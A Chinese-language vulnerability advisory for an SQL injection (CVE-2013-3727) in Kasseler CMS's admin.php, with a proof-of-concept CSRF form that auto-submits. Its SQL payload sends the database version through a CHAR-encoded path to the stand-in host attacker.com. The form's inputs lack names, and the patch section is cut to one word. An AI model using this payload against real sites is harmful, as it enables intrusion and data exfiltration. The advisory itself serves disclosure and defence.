Kasseler CMS 'groups' SQL注入漏洞

发布日期:2013-07-03
更新日期:2013-07-07

受影响系统:
Kasseler CMS Kasseler CMS <= 2 r1223
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60928
CVE(CAN) ID: CVE-2013-3727

Kasseler CMS是内容管理系统。

Kasseler CMS 存在SQL注入漏洞,此漏洞源于"/admin.php"脚本内的"groups" HTTP POST参数缺少足够的过滤。经过身份验证的远程管理员可利用此漏洞在应用数据库内执行SQL命令。此漏洞也可被未经身份验证的远程攻击者通过CSRF利用。

<*来源:High-Tech Bridge Security Research Lab
 
  链接:https://www.htbridge.com/advisory/HTB23158
       
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<form action="http://[host]/admin.php?module=sendmail&do=send " method="post">
<input type="hidden"  value="1">
<input type="hidden"  value="1">
<input type="hidden"  value="1">
<input type="hidden"  value="123) OR 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
-- ">
<input type="hidden"  value="">
<input type="hidden"  value="">
<input type="submit">
</form>
<script>
document.main.submit();
</script>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

linux

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxdsp.html